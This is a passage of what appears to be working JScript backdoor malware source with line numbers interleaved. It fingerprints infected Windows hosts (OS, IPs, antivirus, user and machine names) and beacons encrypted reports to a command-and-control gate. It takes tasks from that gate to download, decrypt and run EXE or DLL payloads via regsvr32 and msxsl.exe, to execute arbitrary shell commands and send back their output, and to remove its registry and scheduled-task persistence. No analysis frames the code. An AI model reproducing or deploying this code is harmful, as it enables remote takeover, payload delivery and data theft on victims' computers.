rAV += v7 + ",";
1168
}
1169
break;
1170
case 2229870333:
1171
if (rAV.indexOf(v7) === -1) {
1172
rAV += v7 + ",";
1173
}
1174
break;
1175
case 4056687588:
1176
if (rAV.indexOf(v7) === -1) {
1177
rAV += v7 + ",";
1178
}
1179
break;
1180
case 1081013580:
1181
if (rAV.indexOf(v7) === -1) {
1182
rAV += v7 + ",";
1183
}
1184
break;
1185
case 238643926:
1186
if (rAV.indexOf(v8) === -1) {
1187
rAV += v8 + ",";
1188
}
1189
break;
1190
case 3103805340:
1191
if (rAV.indexOf(v8) === -1) {
1192
rAV += v8 + ",";
1193
}
1194
break;
1195
case 3898904431:
1196
if (rAV.indexOf(v9) === -1) {
1197
rAV += v9 + ",";
1198
}
1199
break;
1200
case 2447720335:
1201
if (rAV.indexOf(v9) === -1) {
1202
rAV += v9 + ",";
1203
}
1204
break;
1205
case 1474450799:
1206
if (rAV.indexOf(v9) === -1) {
1207
rAV += v9 + ",";
1208
}
1209
break;
1210
case 1087054291:
1211
if (rAV.indexOf(v10) === -1) {
1212
rAV += v10 + ",";
1213
}
1214
break;
1215
case 3237881663:
1216
if (rAV.indexOf(v11) === -1) {
1217
rAV += v11 + ",";
1218
}
1219
break;
1220
case 2928704260:
1221
if (rAV.indexOf(v12) === -1) {
1222
rAV += v12 + ",";
1223
}
1224
break;
1225
case 3457522114:
1226
if (rAV.indexOf(v13) === -1) {
1227
rAV += v13 + ",";
1228
}
1229
break;
1230
case 1864254150:
1231
if (rAV.indexOf(v13) === -1) {
1232
rAV += v13 + ",";
1233
}
1234
break;
1235
case 2866464079:
1236
if (rAV.indexOf(v13) === -1) {
1237
rAV += v13 + ",";
1238
}
1239
break;
1240
case 3233790880:
1241
if (rAV.indexOf(v14) === -1) {
1242
rAV += v14 + ",";
1243
}
1244
break;
1245
case 3314468719:
1246
if (rAV.indexOf(v15) === -1) {
1247
rAV += v15 + ",";
1248
}
1249
break;
1250
case 2432672291:
1251
if (rAV.indexOf(v16) === -1) {
1252
rAV += v16 + ",";
1253
}
1254
break;
1255
case 332293705:
1256
if (rAV.indexOf(v17) === -1) {
1257
rAV += v17 + ",";
1258
}
1259
break;
1260
case 3917603449:
1261
if (rAV.indexOf(v17) === -1) {
1262
rAV += v17 + ",";
1263
}
1264
break;
1265
case 3707949399:
1266
if (rAV.indexOf(v17) === -1) {
1267
rAV += v17 + ",";
1268
}
1269
break;
1270
case 61053860:
1271
if (rAV.indexOf(v17) === -1) {
1272
rAV += v17 + ",";
1273
}
1274
break;
1275
case 1570161171:
1276
if (rAV.indexOf(v18) === -1) {
1277
rAV += v18 + ",";
1278
}
1279
break;
1280
case 1146093233:
1281
if (rAV.indexOf(v19) === -1) {
1282
rAV += v19 + ",";
1283
}
1284
break;
1285
case 3758109384:
1286
if (rAV.indexOf(v20) === -1) {
1287
rAV += v20 + ",";
1288
}
1289
break;
1290
case 3601606648:
1291
if (rAV.indexOf(v21) === -1) {
1292
rAV += v21 + ",";
1293
}
1294
break;
1295
case 2544592543:
1296
if (rAV.indexOf(v22) === -1) {
1297
rAV += v22 + ",";
1298
}
1299
break;
1300
case 2514406649:
1301
if (rAV.indexOf(v23) === -1) {
1302
rAV += v23 + ",";
1303
}
1304
break;
1305
case 807313958:
1306
if (rAV.indexOf(v24) === -1) {
1307
rAV += v24 + ",";
1308
}
1309
break;
1310
case 2213386403:
1311
if (rAV.indexOf(v25) === -1) {
1312
rAV += v25 + ",";
1313
}
1314
break;
1315
case 2880445231:
1316
if (rAV.indexOf(v26) === -1) {
1317
rAV += v26 + ",";
1318
}
1319
break;
1320
case 2394653102:
1321
if (rAV.indexOf(v27) === -1) {
1322
rAV += v27 + ",";
1323
}
1324
break;
1325
case 1164644511:
1326
if (rAV.indexOf(v3) === -1) {
1327
rAV += v3 + ",";
1328
}
1329
break;
1330
case 1683252343:
1331
if (rAV.indexOf(v28) === -1) {
1332
rAV += v28 + ",";
1333
}
1334
break;
1335
case 1460978182:
1336
if (rAV.indexOf(v29) === -1) {
1337
rAV += v29 + ",";
1338
}
1339
break;
1340
case 3576979024:
1341
if (rAV.indexOf(v30) === -1) {
1342
rAV += v30 + ",";
1343
}
1344
break;
1345
case 3540381638:
1346
if (rAV.indexOf(v31) === -1) {
1347
rAV += v31 + ",";
1348
}
1349
break;
1350
case 4028018370:
1351
if (rAV.indexOf(v31) === -1) {
1352
rAV += v31 + ",";
1353
}
1354
break;
1355
}
1356
x += 1;
1357
} while (x < pList.length);
1358
if (rAV.length >= 1) {
1359
if (rAV.substring(rAV.length - 1) === ",") {
1360
rAV = rAV.substring(0, rAV.length - 1);
1361
}
1362
} else {
1363
rAV = "0";
1364
}
1365
} else {
1366
rAV = "0";
1367
}
1368
pList = [];
1369
if (rAV) {
1370
return rAV;
1371
} else {
1372
return "0";
1373
}
1374
}
1375
1376
function ascii_to_hex(str) {
1377
var arr1 = [];
1378
var hex1;
1379
var str1;
1380
if (!str) {
1381
return "0";
1382
}
1383
try {
1384
str1 = str.toString();
1385
var n = 0;
1386
var count1 = str1.length;
1387
do {
1388
hex1 = Number(str1.charCodeAt(n)).toString(16);
1389
arr1.push(hex1);
1390
n = n + 1;
1391
} while (n < count1);
1392
return arr1.join('');
1393
} catch (e93) {
1394
try {
1395
str1 = str.toString();
1396
} catch (e93) {
1397
str1 = str;
1398
}
1399
if (str1) {
1400
return str1;
1401
} else {
1402
return str;
1403
}
1404
}
1405
}
1406
1407
function os_hwid_install_date() {
1408
var objFSO1;
1409
var objFile;
1410
var dt1;
1411
try {
1412
objFSO1 = obj("Scripting.FileSystemObject");
1413
objFile = objFSO1.GetFile("C:\\Windows\\notepad.exe");
1414
dt1 = new Date(objFile.DateCreated);
1415
} catch (e96) {
1416
try {
1417
objFSO1 = obj("Scripting.FileSystemObject");
1418
objFile = objFSO1.GetFile("C:\\Windows\\winhlp32.exe");
1419
dt1 = new Date(objFile.DateCreated);
1420
} catch (e94) {
1421
return "0";
1422
}
1423
}
1424
if (!dt1) {
1425
return "0";
1426
}
1427
return ascii_to_hex(dt1);
1428
}
1429
1430
function os_version_no_cmd() {
1431
var objFSO;
1432
var verzz;
1433
var Vers1 = "5.1.";
1434
var Vers2 = "5.2.";
1435
var Vers3 = "6.0.";
1436
var Vers4 = "6.1.";
1437
var Vers5 = "6.2.";
1438
var Vers6 = "6.3.";
1439
var Vers7 = "10.0.";
1440
var xNow = "";
1441
var vSplit = [];
1442
var Temp1;
1443
var savTo = "";
1444
try {
1445
objFSO = obj("Scripting.FileSystemObject");
1446
savTo = xTmp + tempNow();
1447
objFSO.CopyFile("C:\\Windows\\notepad.exe", savTo);
1448
verzz = objFSO.GetFileVersion(savTo);
1449
dFile(savTo);
1450
savTo = "";
1451
} catch (e99) {
1452
try {
1453
objFSO = obj("Scripting.FileSystemObject");
1454
savTo = xTmp + tempNow();
1455
objFSO.CopyFile("C:\\Windows\\winhlp32.exe", savTo);
1456
verzz = objFSO.GetFileVersion(savTo);
1457
dFile(savTo);
1458
savTo = "";
1459
} catch (e98) {
1460
return "0";
1461
}
1462
}
1463
if (!verzz) {
1464
return "0";
1465
}
1466
try {
1467
if (verzz.indexOf(Vers1) !== -1) {
1468
xNow = Vers1;
1469
}
1470
if (!xNow) {
1471
if (verzz.indexOf(Vers3) !== -1) {
1472
xNow = Vers3;
1473
}
1474
}
1475
if (!xNow) {
1476
if (verzz.indexOf(Vers4) !== -1) {
1477
xNow = Vers4;
1478
}
1479
}
1480
if (!xNow) {
1481
if (verzz.indexOf(Vers5) !== -1) {
1482
xNow = Vers5;
1483
}
1484
}
1485
if (!xNow) {
1486
if (verzz.indexOf(Vers6) !== -1) {
1487
xNow = Vers6;
1488
}
1489
}
1490
if (!xNow) {
1491
if (verzz.indexOf(Vers7) !== -1) {
1492
xNow = Vers7;
1493
}
1494
}
1495
if (!xNow) {
1496
if (verzz.indexOf(Vers2) !== -1) {
1497
xNow = Vers2;
1498
}
1499
}
1500
Vers1 = "";
1501
Vers2 = "";
1502
Vers3 = "";
1503
Vers4 = "";
1504
Vers5 = "";
1505
Vers6 = "";
1506
Vers7 = "";
1507
if (xNow) {
1508
vSplit = verzz.split(xNow);
1509
if (vSplit[1]) {
1510
Temp1 = vSplit[1];
1511
if (Temp1) {
1512
Build = Temp1;
1513
} else {
1514
Build = "0";
1515
}
1516
}
1517
return xNow;
1518
} else {
1519
return "0";
1520
}
1521
} catch (e99) {
1522
return "0";
1523
}
1524
}
1525
1526
function local_ip2() {
1527
var vStr = "";
1528
var fso;
1529
var file2;
1530
var xRet = "";
1531
var xNow = "";
1532
var vSplit = [];
1533
var xSplit = [];
1534
var i;
1535
var rFile = "";
1536
var xipnow = "";
1537
var ipsList = [];
1538
var itemNow2;
1539
var ret5;
1540
try {
1541
var loc2 = obj("WbemScripting.SWbemLocator");
1542
var svc2 = loc2.ConnectServer(".", "root\\cimv2");
1543
var col2 = svc2.ExecQuery("SELECT IPAddress FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = True");
1544
var items2 = new Enumerator(col2);
1545
while (items2.atEnd() === false) {
1546
itemNow2 = items2.item();
1547
if (itemNow2) {
1548
xipnow = itemNow2.IPAddress(0);
1549
if (xipnow) {
1550
ipsList.push(xipnow);
1551
}
1552
}
1553
items2.moveNext();
1554
}
1555
} catch (eip1) {
1556
try {
1557
rFile = xTmp + tempNow();
1558
var r1 = rStr(rInt(4, 8));
1559
ret5 = wmi_command('cmd /v /c set "' + r1 + '=I" && !' + r1 + '!pconf!' + r1 + '!g | f!' + r1 + '!ndstr /R /C:"!' + r1 + '!Pv4 Address" > "' + rFile + '"', 1);
1560
r1 = "";
1561
if (ret5 == false) {
1562
dFile(rFile);
1563
return "0";
1564
}
1565
if (fexist(rFile) === true) {
1566
fso = obj("Scripting.FileSystemObject");
1567
file2 = fso.OpenTextFile(rFile, 1, 0);
1568
if (file2.AtEndOfStream === false) {
1569
vStr = file2.ReadAll();
1570
}
1571
file2.Close();
1572
dFile(rFile);
1573
} else {
1574
return "0";
1575
}
1576
if (vStr) {
1577
vSplit = vStr.split(/\r?\n/);
1578
} else {
1579
return "0";
1580
}
1581
if (vSplit.length >= 0) {
1582
i = 0;
1583
do {
1584
xNow = vSplit[i];
1585
if (xNow) {
1586
xSplit = xNow.split(": ");
1587
if (xSplit.length === 2) {
1588
xipnow = xSplit[1];
1589
if (xipnow) {
1590
ipsList.push(xipnow);
1591
}
1592
}
1593
}
1594
i += 1;
1595
} while (i < vSplit.length);
1596
vSplit = [];
1597
xSplit = [];
1598
} else {
1599
return "0";
1600
}
1601
} catch (e891) {
1602
return "0";
1603
}
1604
}
1605
xipnow = "";
1606
i = 0;
1607
try {
1608
if (ipsList.length <= 0) {
1609
return "0";
1610
}
1611
do {
1612
xipnow = ipsList[i];
1613
if (xipnow && xRet.indexOf(xipnow) === -1 && xipnow !== "0.0.0.0") {
1614
xRet = xRet + xipnow + ",";
1615
}
1616
i += 1;
1617
} while (i < ipsList.length);
1618
xRet = xRet.substring(0, xRet.length - 1);
1619
if (xRet) {
1620
return xRet;
1621
} else {
1622
return "0";
1623
}
1624
} catch (eip2) {
1625
return "0";
1626
}
1627
}
1628
1629
function os_product_no_wmi() {
1630
var key1 = "HKLM\\SYSTEM\\CurrentControlSet\\Control\\ProductOptions\\ProductType";
1631
var reg1;
1632
var rdata1 = "";
1633
try {
1634
reg1 = obj("WScript.Shell");
1635
rdata1 = reg1.RegRead(key1);
1636
if (rdata1.length >= 3) {
1637
if (rdata1 == "WinNT") {
1638
return "1";
1639
} else {
1640
return "3";
1641
}
1642
} else {
1643
return "1";
1644
}
1645
} catch (eos5) {
1646
return "1";
1647
}
1648
}
1649
1650
function bot_header() {
1651
var vParti = "";
1652
var osf = "";
1653
var vNTvers = "";
1654
var vlIP = "";
1655
var b2 = "";
1656
var av11 = "";
1657
var sRet = "";
1658
var uUnicode = "";
1659
var pUnicode = "";
1660
osf = os_version_no_cmd();
1661
if (!osf) {
1662
osf = "0";
1663
}
1664
if (!Build) {
1665
Build = "0";
1666
}
1667
vlIP = local_ip2();
1668
if (!vlIP) {
1669
vlIP = "0";
1670
}
1671
if (myBits() === "64") {
1672
b2 = "1";
1673
} else {
1674
b2 = "0";
1675
}
1676
vNTvers = os_product_no_wmi();
1677
if (!vNTvers) {
1678
vNTvers = "0";
1679
}
1680
av11 = cAV();
1681
table = [];
1682
if (!av11) {
1683
av11 = "0";
1684
}
1685
vParti = os_hwid_install_date();
1686
if (!vParti) {
1687
vParti = "0";
1688
}
1689
uUnicode = remove_non_ascii(UNM);
1690
if (!uUnicode) {
1691
uUnicode = "0";
1692
}
1693
pUnicode = remove_non_ascii(PCN);
1694
if (!pUnicode) {
1695
pUnicode = "0";
1696
}
1697
sRet = "|" + vParti + "|" + av11 + "|" + uUnicode + "|" + pUnicode + "|" + osf + "|" + vNTvers + "|" + Build + "|" + b2 + "|" + vlIP + "|" + BV;
1698
BV = "";
1699
return sRet;
1700
}
1701
1702
function hit_Gate(URL, POSTdata, gResponse, method) {
1703
var Resp = "";
1704
var Temp89 = "";
1705
var con4;
1706
var respzz;
1707
if (SYSTEM === 1) {
1708
con4 = xhr;
1709
} else {
1710
if (method === 1) {
1711
con4 = xhr;
1712
} else {
1713
con4 = con;
1714
}
1715
}
1716
try {
1717
con4.open("POST", URL, false);
1718
} catch (e10) {
1719
if (SYSTEM === 0 && method === 0) {
1720
return hit_Gate(URL, POSTdata, gResponse, 1);
1721
} else {
1722
return "gErr";
1723
}
1724
}
1725
if (gResponse === 1) {
1726
con4.onreadystatechange = function() {
1727
if (con4.readyState === 4) {
1728
if (con4.status === 200) {
1729
respzz = con4.responseText;
1730
if (respzz) {
1731
Temp89 = base91_decode(respzz);
1732
if (Temp89) {
1733
var wo = Temp89.substr(0, Temp89.length - 2);
1734
var KeyNow = Temp89.substr(Temp89.length - 2);
1735
Resp = zzzz4(Rkey + KeyNow, wo);
1736
if (Resp) {
1737
respzz = "";
1738
} else {
1739
Resp = "gErr";
1740
}
1741
} else {
1742
Resp = "gErr";
1743
}
1744
} else {
1745
Resp = "OK";
1746
}
1747
} else {
1748
Resp = "gErr";
1749
}
1750
}
1751
};
1752
}
1753
var keynow = rStr(2);
1754
var rNow = rInt(8, 32);
1755
var not_unique = POSTdata + "|" + rStr(rNow) + "|";
1756
var xCrypted = zzzz4(Rkey + keynow, not_unique) + keynow;
1757
var encoded = base91_encode(xCrypted);
1758
var g11 = 0;
1759
if (SYSTEM === 1 || method === 1) {
1760
try {
1761
con4.setOption(2, 13056);
1762
} catch (e411) {
1763
g11 = 1;
1764
}
1765
}
1766
try {
1767
con4.send(encoded);
1768
} catch (e11) {
1769
if (SYSTEM === 0 && method === 0) {
1770
return hit_Gate(URL, POSTdata, gResponse, 1);
1771
} else {
1772
return "gErr";
1773
}
1774
}
1775
if (gResponse === 1) {
1776
return Resp;
1777
}
1778
}
1779
1780
function dExec(zURL, myKey, xPE, xEntryP) {
1781
var ret2 = "";
1782
var Final;
1783
var con2 = con;
1784
var binVariant;
1785
var adb;
1786
var ret6;
1787
var cCommand;
1788
var dq = '"';
1789
try {
1790
con2.open("GET", zURL, false);
1791
} catch (e16) {
1792
return "E";
1793
}
1794
con2.onreadystatechange = function() {
1795
if (con2.readyState === 4) {
1796
if (con2.status === 200) {
1797
try {
1798
adb = obj("ADODB.Stream");
1799
adb.open();
1800
adb.type = 1;
1801
adb.write(con2.responsebody);
1802
adb.position = 0;
1803
adb.Type = 2;
1804
adb.Charset = 437;
1805
binVariant = adb.ReadText();
1806
} catch (ewtf) {
1807
return "E";
1808
}
1809
if (binVariant) {
1810
var ByteArray = tB(binVariant);
1811
var xDecrypted = zzz4Bytes(ByteArray, myKey);
1812
if (mZcheck(xDecrypted)) {
1813
if (xPE === "exe") {
1814
Final = xApp + "\\" + tempNow();
1815
}
1816
if (xPE === "dll") {
1817
Final = xApp + "\\" + tempExtra() + ".ocx";
1818
}
1819
try {
1820
adb.position = 0;
1821
adb.type = 2;
1822
adb.Charset = 437;
1823
adb.WriteText(tS(xDecrypted));
1824
adb.SaveToFile(Final);
1825
adb.close();
1826
} catch (ewtf1) {
1827
return "E";
1828
}
1829
if (xPE === "exe") {
1830
ret6 = wmi_command(dq + Final + dq, 0);
1831
Final = "";
1832
if (ret6 == true) {
1833
ret2 = "OK";
1834
} else {
1835
ret2 = "E";
1836
}
1837
}
1838
if (xPE === "dll") {
1839
var Mitm_exe = "regsvr32.exe";
1840
if (Final) {
1841
var path1 = myEnv("SYSTEMROOT", 0);
1842
if (myBits() === "64") {
1843
path1 += "\\SysWOW64\\" + Mitm_exe;
1844
} else {
1845
path1 += "\\System32\\" + Mitm_exe;
1846
}
1847
switch (xEntryP) {
1848
case "1":
1849
cCommand = " /s /i ";
1850
break;
1851
case "2":
1852
cCommand = " /s /n /i ";
1853
break;
1854
case "3":
1855
cCommand = " /s /u ";
1856
break;
1857
default:
1858
cCommand = " /s /i ";
1859
}
1860
path1 += cCommand + dq + Final + dq;
1861
cCommand = "";
1862
ret6 = wmi_command(path1, 0);
1863
path1 = "";
1864
if (ret6 == true) {
1865
ret2 = "OK";
1866
} else {
1867
ret2 = "E";
1868
}
1869
} else {
1870
ret2 = "E";
1871
}
1872
}
1873
} else {
1874
ret2 = "E";
1875
}
1876
} else {
1877
ret2 = "E";
1878
}
1879
} else {
1880
ret2 = "E";
1881
}
1882
}
1883
};
1884
try {
1885
con2.send();
1886
} catch (e5) {
1887
return "E";
1888
}
1889
return ret2;
1890
}
1891
1892
function rev_cmd(xCo) {
1893
var fso3;
1894
var rFile = "";
1895
var file6;
1896
var vStr;
1897
var rt1;
1898
try {
1899
if (xCo) {
1900
rFile = xTmp + tempNow();
1901
rt1 = wmi_command("cmd /v /c " + xCo + ' > "' + rFile + '" 2>&1', 1);
1902
if (rt1 == false) {
1903
dFile(rFile);
1904
return "0";
1905
}
1906
if (fexist(rFile) === true) {
1907
fso3 = obj("Scripting.FileSystemObject");
1908
file6 = fso3.OpenTextFile(rFile, 1, 0);
1909
if (file6.AtEndOfStream === false) {
1910
vStr = file6.ReadAll();
1911
}
1912
file6.Close();
1913
dFile(rFile);
1914
} else {
1915
return "0";
1916
}
1917
} else {
1918
return "0";
1919
}
1920
} catch (eg1) {
1921
return "0";
1922
}
1923
try {
1924
if (vStr) {
1925
vStr = vStr.replace(/^\s*$(?:\r\n?|\n)/gm, "");
1926
return vStr;
1927
} else {
1928
return "0";
1929
}
1930
} catch (eg2) {
1931
return "0";
1932
}
1933
}
1934
var mainCommand = "";
1935
var fCore = "";
1936
var fStart = "";
1937
1938
function eTask(fullTask) {
1939
if (fullTask) {
1940
var eState = "0";
1941
var TaskReply;
1942
var x1;
1943
var Note;
1944
var Sp;
1945
var tURL;
1946
var fPasw;
1947
var flink;
1948
var ret77;
1949
var tPE;
1950
var dq2 = "";
1951
var UniqKey = "";
1952
var reg1 = "";
1953
var uName = "";
1954
var r_sh = "";
1955
var ret4;
1956
var startPoint;
1957
var pieces = fullTask.split("|");
1958
var count1 = pieces.length;
1959
if (count1 >= 5) {
1960
var tType = pieces[1];
1961
var tID = pieces[2];
1962
switch (tType) {
1963
case "d&exec":
1964
if (count1 >= 7) {
1965
flink = pieces[3];
1966
tPE = pieces[4];
1967
if (!tPE) {
1968
tPE = "exe";
1969
}
1970
if (flink) {
1971
if (flink.indexOf(",") !== -1) {
1972
Sp = flink.split(",");
1973
tURL = Sp[0];
1974
fPasw = Sp[1];
1975
if (count1 === 8) {
1976
startPoint = pieces[5];
1977
}
1978
if (tURL && fPasw) {
1979
if (dExec(tURL, fPasw, tPE, startPoint) === "OK") {
1980
eState = "1";
1981
} else {
1982
wmi_waitfor2(1, 0);
1983
if (dExec(tURL, fPasw, tPE, startPoint) === "OK") {
1984
eState = "1";
1985
}
1986
}
1987
}
1988
}
1989
}
1990
}
1991
TaskReply = PreserveH + "|" + eState + "|" + tID;
1992
hit_Gate(Gate, TaskReply, 0, 0);
1993
break;
1994
case "gtfo":
1995
reg1 = rootK + "\\Environment\\UserInitMprLogonScript";
1996
try {
1997
x1 = obj("WScript.Shell");
1998
} catch (er78) {
1999
x1 = false;
2000
}
2001
if (x1) {
2002
try {
2003
if (rexist(xStore) === true) {
2004
Note = x1.RegRead(xStore);
2005
if (Note && Note.indexOf(",") !== -1) {
2006
Sp = Note.split(",");
2007
uName = Sp[0];
2008
UniqKey = rootK + "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" + uName;
2009
}
2010
}
2011
} catch (e104) {
2012
UniqKey = "";
2013
}
2014
try {
2015
if (UniqKey && rexist(UniqKey) === true) {
2016
x1.RegDelete(UniqKey);
2017
}
2018
} catch (e80) {
2019
UniqKey = "";
2020
}
2021
try {
2022
if (reg1 && rexist(reg1) === true) {
2023
x1.RegDelete(reg1);
2024
ret77 = "1";
2025
}
2026
} catch (e81) {
2027
ret77 = "0";
2028
}
2029
try {
2030
if (xStore && rexist(xStore) === true) {
2031
x1.RegDelete(xStore);
2032
ret77 = "1";
2033
}
2034
} catch (e84) {
2035
if (ret77 !== "1") {
2036
ret77 = "0";
2037
}
2038
}
2039
try {
2040
if (fexist(fCore) === true) {
2041
dFile(fCore);
2042
ret77 = "1";
2043
}
2044
} catch (e82) {
2045
if (ret77 !== "1") {
2046
ret77 = "0";
2047
}
2048
}
2049
try {
2050
if (fexist(fStart) === true) {
2051
dFile(fStart);
2052
ret77 = "1";
2053
}
2054
} catch (e83) {
2055
if (ret77 !== "1") {
2056
ret77 = "0";
2057
}
2058
}
2059
try {
2060
if (uName && SYSTEM === 1) {
2061
ret4 = wmi_command("SCHTASKS.exe /Delete /TN " + uName + " /F", 1);
2062
}
2063
if (ret4 == true) {
2064
ret77 = "1";
2065
}
2066
} catch (e84) {
2067
if (ret77 !== "1") {
2068
ret77 = "0";
2069
}
2070
}
2071
} else {
2072
ret77 = "0";
2073
}
2074
if (!ret77) {
2075
ret77 = "0";
2076
}
2077
hit_Gate(Gate, PreserveH + "|" + ret77 + "|" + tID, 0, 0);
2078
if (ret77 === "1") {
2079
gtfo = true;
2080
selfdel = true;
2081
}
2082
break;
2083
case "more_onion":
2084
try {
2085
if (fexist(fCore) === true) {
2086
dq2 = '"';
2087
mainCommand = dq2 + main_mitm + dq2 + " " + dq2 + fCore + dq2 + " " + dq2 + fCore + dq2;
2088
ret4 = wmi_command(mainCommand, 0);
2089
if (ret4 == true) {
2090
ret77 = "1";
2091
} else {
2092
ret77 = "0";
2093
}
2094
} else {
2095
ret77 = "0";
2096
}
2097
} catch (e1672) {
2098
ret77 = "0";
2099
}
2100
hit_Gate(Gate, PreserveH + "|" + ret77 + "|" + tID, 0, 0);
2101
if (ret77 === "1") {
2102
gtfo = true;
2103
}
2104
break;
2105
case "via_c":
2106
if (count1 === 6) {
2107
flink = pieces[3];
2108
if (flink) {
2109
ret4 = wmi_command("cmd /v /c " + flink + " & exit", 0);
2110
if (ret4 == true) {
2111
eState = "1";
2112
} else {
2113
eState = "0";
2114
}
2115
if (!eState) {
2116
eState = "0";
2117
}
2118
TaskReply = PreserveH + "|" + eState + "|" + tID;
2119
hit_Gate(Gate, TaskReply, 0, 0);
2120
}
2121
}
2122
break;
2123
case "more_time":
2124
if (count1 === 6) {
2125
flink = pieces[3];
2126
if (flink) {
2127
r_sh = rev_cmd(flink);
2128
if (r_sh) {
2129
if (r_sh !== "0") {
2130
r_sh = base64_encode(r_sh);
2131
}
2132
} else {
2133
r_sh = "0";
2134
}
2135
TaskReply = PreserveH + "|" + r_sh + "|" + tID + "|" + base64_encode(flink);
2136
r_sh = "";
2137
hit_Gate(Gate, TaskReply, 0, 0);
2138
}
2139
}
2140
break;
2141
}
2142
}
2143
}
2144
}
2145
2146
function main() {
2147
var dq2 = '"';
2148
var HitNow = "";
2149
var ret8;
2150
if (PreserveH === "") {
2151
PreserveH = bot_header();
2152
}
2153
if (xStore === "") {
2154
var valo = "\\Software\\Microsoft\\Notepad\\";
2155
if (SYSTEM === 1) {
2156
xStore = rootK + valo + PCN;
2157
} else {
2158
xStore = rootK + valo + UNM;
2159
}
2160
}
2161
rcon_now += 1;
2162
if (rcon_now >= rcon_max) {
2163
try {
2164
if (fexist(fCore) === true) {
2165
mainCommand = dq2 + main_mitm + dq2 + " " + dq2 + fCore + dq2 + " " + dq2 + fCore + dq2;
2166
ret8 = wmi_command(mainCommand, 0);
2167
if (ret8 == true) {
2168
gtfo = true;
2169
} else {
2170
gtfo = false;2
2171
}
2172
}
2173
} catch (ez12) {
2174
gtfo = false;
2175
}
2176
} else {
2177
HitNow = hit_Gate(Gate, PreserveH, 1, 0);
2178
switch (HitNow) {
2179
case "gErr":
2180
wmi_waitfor(error_retry);
2181
break;
2182
case "OK":
2183
break;
2184
default:
2185
eTask(HitNow);
2186
}
2187
}
2188
if (gtfo === false) {
2189
wmi_waitfor(hit_each);
2190
} else {
2191
if (selfdel === true && fexist(main_mitm) === true) {
2192
wmi_command('cmd.exe /c del "' + main_mitm + dq2, 0);
2193
}
2194
}
2195
}
2196
2197
function go() {
2198
if (check_Net(0) === true) {
2199
if (check_Host(0) === true) {
2200
main();
2201
} else {
2202
wmi_waitfor2(hit_each, 1);
2203
}
2204
} else {
2205
wmi_waitfor2(3, 1);
2206
}
2207
}
2208
2209
function check_inside() {
2210
var x1;
2211
var Note;
2212
var Sp;
2213
var net;
2214
if ((UNM === "") || (PCN === "")) {
2215
try {
2216
net = obj('WScript.Network');
2217
PCN = net.ComputerName;
2218
UNM = net.UserName;
2219
} catch (e781) {
2220
PCN = "pc_error";
2221
UNM = "user_error";
2222
}
2223
}
2224
if (xStore === "") {
2225
var valo = "\\Software\\Microsoft\\Notepad\\";
2226
if (SYSTEM === 1) {
2227
xStore = rootK + valo + PCN;
2228
} else {
2229
xStore = rootK + valo + UNM;
2230
}
2231
}
2232
try {
2233
x1 = obj("WScript.Shell");
2234
Note = x1.RegRead(xStore);
2235
if (Note) {
2236
if (Note.indexOf(",") !== -1) {
2237
Sp = Note.split(",");
2238
if (Sp.length === 3) {
2239
fCore = workingDir + Sp[1] + ".txt";
2240
fStart = workingDir + Sp[2] + ".txt";
2241
if (fexist(fCore) === false) {
2242
return false;
2243
}
2244
if (fexist(fStart) === false) {
2245
return false;
2246
}
2247
if (fexist(main_mitm) === false) {
2248
return false;
2249
}
2250
return true;
2251
} else {
2252
return false;
2253
}
2254
} else {
2255
return false;
2256
}
2257
} else {
2258
return false;
2259
}
2260
} catch (e89) {
2261
if (SYSTEM === 1) {
2262
SYSTEM = 0;
2263
rootK = "HKCU";
2264
xApp = myEnv("APPDATA", 0);
2265
workingDir = xApp + "\\Microsoft\\";
2266
main_mitm = workingDir + "msxsl.exe";
2267
xStore = "";
2268
return check_inside();
2269
} else {
2270
return false;
2271
}
2272
}
2273
}
2274
2275
function sys() {
2276
var sh11;
2277
var tez = "";
2278
var sys123 = "HKEY_USERS\\S-1-5-19\\Environment\\TEMP";
2279
try {
2280
sh11 = obj("WScript.Shell");
2281
tez = sh11.RegRead(sys123);
2282
if (tez) {
2283
return true;
2284
} else {
2285
return false;
2286
}
2287
} catch (e181) {
2288
return false;
2289
}
2290
}
2291
if (sys() === true) {
2292
SYSTEM = 1;
2293
rootK = "HKLM";
2294
xApp = sFolder(35);
2295
if (xApp === false) {
2296
xApp = myEnv("APPDATA", 0);
2297
}
2298
} else {
2299
xApp = myEnv("APPDATA", 0);
2300
}
2301
xTmp = myEnv("TMP", 0) + "\\";
2302
workingDir = xApp + "\\Microsoft\\";
2303
main_mitm = workingDir + "msxsl.exe";
2304
if (check_inside() == true) {
2305
go();
2306
}